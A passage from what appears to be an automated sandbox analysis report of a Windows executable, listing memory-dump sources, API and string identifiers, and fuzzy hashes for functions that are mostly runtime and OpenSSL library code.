                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                              • API String ID: 3215553584-1196891531
                                                              • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                              • Instruction ID: 16fcf6c1c2939ae8973adc2449e308ef80cfa3d205bf8e4658ba90451dbd632a
                                                              • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                              • Instruction Fuzzy Hash: 1B818B72E0E203C5FB74CF29C15027927A2AB19B4CF558035DA3AD72E9FEADE905D601
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989811289.00007FFDFAEE1000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989771802.00007FFDFAEE0000.00000002.00000001.01000000.00000013.sdmp
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAF44000.00000040.00000001.01000000.00000013.sdmp
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAF93000.00000040.00000001.01000000.00000013.sdmp
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFEC000.00000040.00000001.01000000.00000013.sdmp
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFF1000.00000040.00000001.01000000.00000013.sdmp
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFF4000.00000040.00000001.01000000.00000013.sdmp
                                                              • Associated: 00000001.00000002.1990150988.00007FFDFAFF5000.00000080.00000001.01000000.00000013.sdmp
                                                              • Associated: 00000001.00000002.1990196980.00007FFDFAFF7000.00000004.00000001.01000000.00000013.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfaee0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007B6570
                                                              • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                              • API String ID: 4069847057-87138338
                                                              • Opcode ID: 584a3ecbb584e5f31d1f5134e6ee0f37006161d217b53c308b4eadc448ab7721
                                                              • Instruction ID: e36873e24ca769185d08284cb94f2217b2885564662714178cba051f36b9875d
                                                              • Opcode Fuzzy Hash: 584a3ecbb584e5f31d1f5134e6ee0f37006161d217b53c308b4eadc448ab7721
                                                              • Instruction Fuzzy Hash: 79713932B0854246EB68EF19A8A0AB97361BF84754F460275EE6E476DCEF3DDD058700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 2395640692-1018135373
                                                              • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                              • Instruction ID: 7555ce8033bff93ce848f9201fb72d2c70babcad80ee5b57bb5a117864d3585a
                                                              • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                              • Instruction Fuzzy Hash: D9515F32F196438ADB14CB15E844A7D7791FB88B98F148131EA6987FE4FE79F8818700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                              • Instruction ID: e1f080a5e38b8d542ba4a18d8ea05712d3fa2e7b27fd4cc32a51703e8e7905ff
                                                              • Opcode Fuzzy Hash: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                              • Instruction Fuzzy Hash: F8616433D0878685D761DB15E4407AEB7A0FB89B98F044225EBAD87BA5DF7CE194CB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                              • Instruction ID: a6c22ba9bb68c41f0de174055e8b82e1e5c9fb922441a5d797d154e7415f4d60
                                                              • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                              • Instruction Fuzzy Hash: 9E518D33E0824386EBA4CB21D04426E76A1EB5DB98F144135DA6D97FE5EFBCF8508B41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ..\s\crypto\async\async.c$T
                                                              • API String ID: 0-2182492907
                                                              • Opcode ID: 35f0047b15d0707436582e346161fd0798c88da3669e9136a27bd4f66ac9aa58
                                                              • Instruction ID: 1856ac2739ab7193246910b49b29995044c64ef1a73ff5b90e14431acb39d1c3
                                                              • Opcode Fuzzy Hash: 35f0047b15d0707436582e346161fd0798c88da3669e9136a27bd4f66ac9aa58
                                                              • Instruction Fuzzy Hash: 07517C31B1AA4386EB20EB11D420DB97761EF46784F444035DAAD47BEDDF3DEA09AB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: getnameinfohtons
                                                              • String ID: $..\s\crypto\bio\b_addr.c
                                                              • API String ID: 1503050688-1606403076
                                                              • Opcode ID: 3e1d6eff2a227a7976513e37b9e77a30347737a810686e613b04f7a4be4ac52b
                                                              • Instruction ID: 1f4e682c4593e5e1ee1b3ea3d3b05a79359c6f820c501d81f28f4d101a1d5791
                                                              • Opcode Fuzzy Hash: 3e1d6eff2a227a7976513e37b9e77a30347737a810686e613b04f7a4be4ac52b
                                                              • Instruction Fuzzy Hash: 3651A361B0A68386FB209F15D421AB973A0EF42784F444135EBAD47AFDEF3DE9859700
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ..\s\crypto\bio\b_sock.c$J$host=
                                                              • API String ID: 0-1729655730
                                                              • Opcode ID: 01b0efafc7697a4f7d6a1a530da6b0f90e7318cc905d80235fe94a0ed0c4634c
                                                              • Instruction ID: b4ec106b901c8aa8735f00a9017c661399a6aacb2fbb230aeca15002a946444f
                                                              • Opcode Fuzzy Hash: 01b0efafc7697a4f7d6a1a530da6b0f90e7318cc905d80235fe94a0ed0c4634c
                                                              • Instruction Fuzzy Hash: BD316D72B0968382EB109B55E4619AEA360FF867D4F480035EBAC43BEEDF3DD5419B04
                                                              APIs
                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF6FB1E324C,?,?,00007FF6FB1E3964), ref: 00007FF6FB1E7642
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory
                                                              • String ID: %.*s$%s%c$\
                                                              • API String ID: 4241100979-1685191245
                                                              • Opcode ID: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                              • Instruction ID: a68329dc8879b11a9db30ed83c52efd69019cf10e3089e6c2c5d6ba49b7c8718
                                                              • Opcode Fuzzy Hash: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                              • Instruction Fuzzy Hash: 1F318221E19AC745FB21DB15E8107AE6254EB4CBE8F444231EA7D83BE9FF2CE2458700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: ..\s\crypto\pem\pem_pkey.c$DH PARAMETERS$X9.42 DH PARAMETERS
                                                              • API String ID: 2248877218-3633731555
                                                              • Opcode ID: a869657134236d192bf55b71c30afc63e44118ee3aaabe2d3ab7b1e4e1248b07
                                                              • Instruction ID: 8f78a24dabaa1ebeadb2c51e0a47753feb60363251364ff2c8fcf2dd08dd54d7
                                                              • Opcode Fuzzy Hash: a869657134236d192bf55b71c30afc63e44118ee3aaabe2d3ab7b1e4e1248b07
                                                              • Instruction Fuzzy Hash: 0321A122B0AA8381EB10DB51E4209AAA3A0FF95794F448135EA9C47BFDEF7DD144CF00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message$ByteCharMultiWide
                                                              • String ID: Error/warning (ANSI fallback)$Warning
                                                              • API String ID: 1878133881-2698358428
                                                              • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                              • Instruction ID: 3ed3cb0239aaeb0ff4cb6b4e2db05f74bcbd9ad01f1ac0e3bf737689f830a1be
                                                              • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                              • Instruction Fuzzy Hash: 18118172A28A4681EB20DB10F565BAD3364FB48B88F501135DA6D876A4EF3CE605C740
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message$ByteCharMultiWide
                                                              • String ID: Error$Error/warning (ANSI fallback)
                                                              • API String ID: 1878133881-653037927
                                                              • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                              • Instruction ID: 36a2b72a220d63366705eaaa16e71de296a558917ac96bff469b69b89cc2150d
                                                              • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                              • Instruction Fuzzy Hash: 9F118E72A28A8681EB20DB00F565BAD6364FB4CBC8F901135DA6D876A4EF3CE605C740
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastsocket
                                                              • String ID: ..\s\crypto\bio\b_sock2.c$2
                                                              • API String ID: 1120909799-2051290508
                                                              • Opcode ID: 7734bc7eb848a8c2f13e03d8370f2b6d25dc2938cf9324aa6d1bac55b8e4a966
                                                              • Instruction ID: d4161843b6e6fcc7b21a708a9dcf9532b4e6757e0bcf0df2a9dae95af6bc5020
                                                              • Opcode Fuzzy Hash: 7734bc7eb848a8c2f13e03d8370f2b6d25dc2938cf9324aa6d1bac55b8e4a966
                                                              • Instruction Fuzzy Hash: 8001C071B0A99383E7109B21E4109AE6260FF42798F504635E6BD43BFDCF3DD9019B40
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
                                                              • Instruction ID: e1affca7c548a8535667676dbf827b4e72c6a21703a0f50ba228eded790927d1
                                                              • Opcode Fuzzy Hash: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
                                                              • Instruction Fuzzy Hash: C3D1D176F08A8289E721CF69D5402AD37B1FB487D8B144235CE6E97BE9EE38D516C300
                                                              APIs
                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FB1FC25B), ref: 00007FF6FB1FC38C
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FB1FC25B), ref: 00007FF6FB1FC417
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
